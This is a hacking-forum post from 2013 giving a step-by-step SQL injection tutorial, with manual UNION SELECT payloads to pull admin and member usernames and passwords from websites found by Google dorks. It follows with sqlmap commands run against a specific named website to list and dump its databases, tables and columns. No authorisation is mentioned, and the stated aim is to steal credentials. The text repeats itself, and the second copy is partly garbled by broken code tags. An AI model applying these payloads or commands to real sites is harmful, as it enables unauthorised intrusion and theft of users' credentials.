.png "Donator (Rank I)")
SQLi Tut + SQLmap! 02-16-2013, 01:20 AM
#1
Instinct and I are working on a tut.
I'm going to work on all the formatting here.
SQLi
What is SQLi?
SQLi is injecting a series of “custom” codes into a webpage to give you access to the database. You can get data such as admin user name and pass along with the usernames and passwords of the members of the website. SQLi is the most common and easiest method of “hacking” today.
Let’s get started.
List of dorks
You are going to enter a dork on Google and put a ‘ after the ?id=x
If you get an error saying something along the lines of: You have an error in your SQL syntax… then the site is vulnerable.
Finding the # columns
At the end of the site enterFor example
url.com/index.php?id=1 order by 5—
If the page reloads go up for example.
url.com/index.php?id=1 order by 10
If you get an error go down.
You want to get to the one right below the first error.
So if order by 7 is error but 6 is not, 6 is the number of columns.
Finding the vulnerable columns
Since there are 6 columns you are going to go to enter
and a - after the = sym
url.com/index.php?id=-1 Union Select 1,2,3,4,5,6--
You have to put a - after =
You should get some numbers showing up on the page. Those are the vulnerable columns.
Getting The Version
Pick a vulnerable colum and replace it with
So an example ill use 2 as the vulnerable column
url.com/index.php?id=-1 Union Select 1, @@version,3,4,5,6--
or url.com/index.php?id=-1 Union Select 1, group_concat(@@version),3,4,5,6--
both work.
The result would be something along the lines of the text doesn’t matter, but if the number is below 5 then it won’t work.
Getting The DB Name
Replace the vulnerable column withThis will get you the database name. Write it down.
Getting table name
Delete and replace it with and before --put
Expample
url.com/index.php?id=-1 Union Select 1, group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() --
Now you are going to get a list. Look for anything having to do with admin, login, users, anything that could potentially have usernames and passwords. Convert the table name of your choice to hex via a text to hex convertor.
Getting Column Names
Now replace with and replace with without quotes. You need the 0x directly before the hex, so no space.
Getting The Data
No if you picked the “right” column you should get something that says ID, Username, Password, sometimes, address, email and more.
Now replace with the column(s) of your choice. If you want two columns you would have an 0x3a in between them with a comma after 0x3a for example
. You also have to replace – replace DBName with the databse name you got from the concat(database()) command earlier and tablename with the table name that you converted to hex, but you can use plain text for this one.
SQLmap is a tool that is getting used much because it does things much faster than manually. I'll prefer you know how to do a manual injection before you try this tool or else you won't learn anything.
You can download SQLmap here: http://sqlmap.org/
Let's get started!
Things you need:
-A website vulnerable to a SQLi injection!
-A brain
-Python installed
I assume you know how a basic SQLi injection works.
I'm running Linux so I'll explain how to do it in Linux. On windows it's bassicly the same except you have to add python ./sqlmap.py every time.
So I'm going to my SQLmap directory.
In my case it'spicture:
Alright once we've found our vulnerable site
you want to get the databases in order to do this you have to use this command:
The u means the it's going to give the site's URL.
The --dbs means it's going to fetch the databases.
Now once you'll have done that you'll get this screen:
picture:
Those are the databases.
We want to take a look in infofir_SE
In order to do that you'll have to use this command:
What does command does is getting the tables from the database
-D infofir_SE is the database where we want the tables from
--TABLES means it's going to get the tables.
Once you've done that you'll see something like this:
picture:
These are the tables.
Now for example we want to take a look in the table called ”sec”
In order to do this we'll have to use this command
-D infofir_SE is the database we want to extract the columns from.
-T sec is the table we want to extracht the columns from.
--columns get's the columns from the table called ' sec' ”-T sec”
Once you've done that you'll see this
picture:
These are the columns.
Now to look what's inside the columns you have to use this command:
-C means the columns
--dump means getting the data and saving it to a file
The file will be saved to wherever your SQLmap folder is located and then “output” and search for the name of the site.
I'll hope you enjoyed this tutorial.
Devil Child
INST1NCT
Brought to you by The Goons!
I'm going to work on all the formatting here.
SQLi
What is SQLi?
SQLi is injecting a series of “custom” codes into a webpage to give you access to the database. You can get data such as admin user name and pass along with the usernames and passwords of the members of the website. SQLi is the most common and easiest method of “hacking” today.
Let’s get started.
List of dorks
Spoiler:
You are going to enter a dork on Google and put a ‘ after the ?id=x
If you get an error saying something along the lines of: You have an error in your SQL syntax… then the site is vulnerable.
Finding the # columns
At the end of the site enter
Code:
order by 5--url.com/index.php?id=1 order by 5—
If the page reloads go up for example.
url.com/index.php?id=1 order by 10
If you get an error go down.
You want to get to the one right below the first error.
So if order by 7 is error but 6 is not, 6 is the number of columns.
Finding the vulnerable columns
Since there are 6 columns you are going to go to enter
Code:
Union Select 1,2,3,4,5,6--url.com/index.php?id=-1 Union Select 1,2,3,4,5,6--
You have to put a - after =
You should get some numbers showing up on the page. Those are the vulnerable columns.
Getting The Version
Pick a vulnerable colum and replace it with
Code:
@@versionSo an example ill use 2 as the vulnerable column
url.com/index.php?id=-1 Union Select 1, @@version,3,4,5,6--
or url.com/index.php?id=-1 Union Select 1, group_concat(@@version),3,4,5,6--
both work.
The result would be something along the lines of
Code:
5.1.37-1ubuntu5.5-logGetting The DB Name
Replace the vulnerable column with
Code:
concat(database())Getting table name
Delete
Code:
concat(databse())Code:
group_concat(table_name)Code:
FROM information_schema.tables WHERE table_schema=database()Expample
url.com/index.php?id=-1 Union Select 1, group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() --
Now you are going to get a list. Look for anything having to do with admin, login, users, anything that could potentially have usernames and passwords. Convert the table name of your choice to hex via a text to hex convertor.
Getting Column Names
Now replace
Code:
group_concat(table_name)Code:
group_concat(column_name)Code:
FROM information_schema.tables WHERE table_schema=database()--Code:
FROM information_schema.columns WHERE table_name=”0xhex Here”Getting The Data
No if you picked the “right” column you should get something that says ID, Username, Password, sometimes, address, email and more.
Now replace
Code:
group_concat(column_name)Code:
group_concat(username0x3a,password)Code:
with FROM information_schema.columns WHERE table_name=hexcharacters[/cdode] with [code]FROM DBName.tablenameSQLmap
Quote:"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
SQLmap is a tool that is getting used much because it does things much faster than manually. I'll prefer you know how to do a manual injection before you try this tool or else you won't learn anything.
You can download SQLmap here: http://sqlmap.org/
Let's get started!
Things you need:
-A website vulnerable to a SQLi injection!
-A brain
-Python installed
I assume you know how a basic SQLi injection works.
I'm running Linux so I'll explain how to do it in Linux. On windows it's bassicly the same except you have to add python ./sqlmap.py every time.
So I'm going to my SQLmap directory.
In my case it's
Code:
cd /home/instinct/SQLmapSpoiler:
![[Image: cg9sf5h.png]](http://i.imgur.com/cg9sf5h.png)
Alright once we've found our vulnerable site
you want to get the databases in order to do this you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 –dbsThe --dbs means it's going to fetch the databases.
Now once you'll have done that you'll get this screen:
picture:
Spoiler:
![[Image: OeSjMp5.png]](http://i.imgur.com/OeSjMp5.png)
Those are the databases.
We want to take a look in infofir_SE
In order to do that you'll have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE –tables-D infofir_SE is the database where we want the tables from
--TABLES means it's going to get the tables.
Once you've done that you'll see something like this:
picture:
Spoiler:
![[Image: ABv7Jws.png]](http://i.imgur.com/ABv7Jws.png)
These are the tables.
Now for example we want to take a look in the table called ”sec”
In order to do this we'll have to use this command
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec –columns-T sec is the table we want to extracht the columns from.
--columns get's the columns from the table called ' sec' ”-T sec”
Once you've done that you'll see this
picture:
Spoiler:
![[Image: ay0m2XZ.png]](http://i.imgur.com/ay0m2XZ.png)
These are the columns.
Now to look what's inside the columns you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec -C –dump--dump means getting the data and saving it to a file
The file will be saved to wherever your SQLmap folder is located and then “output” and search for the name of the site.
I'll hope you enjoyed this tutorial.
Devil Child
INST1NCT
Brought to you by The Goons!
#MakeSinisterlySexyAgain
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)